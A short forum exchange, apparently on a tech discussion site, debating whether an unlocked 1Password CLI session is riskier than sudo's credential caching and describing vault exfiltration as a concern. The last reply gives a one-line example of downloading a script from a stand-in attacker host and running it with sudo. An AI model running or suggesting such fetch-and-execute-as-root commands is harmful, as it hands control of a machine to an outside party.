|
|
|
|
|
|
by damaya1982
260 days ago
|
|
|
Low-risk in terms of what? They’re superficially similar only in that both cache authentication for convenience. But the consequences are totally different. Sudo caches auth to let you run privileged commands locally; it doesn’t hand secrets to other processes. An unlocked 1Password CLI session can be abused by any code that can call the CLI (or read its session token) to export and ship vault contents, that’s an exfiltration vector, not just local privilege reuse. I’d rate that much higher risk personally. |
|
|
or wget https://attacker.com/install_special_pam_bypass.sh | sudo install_special_pam_bypass.sh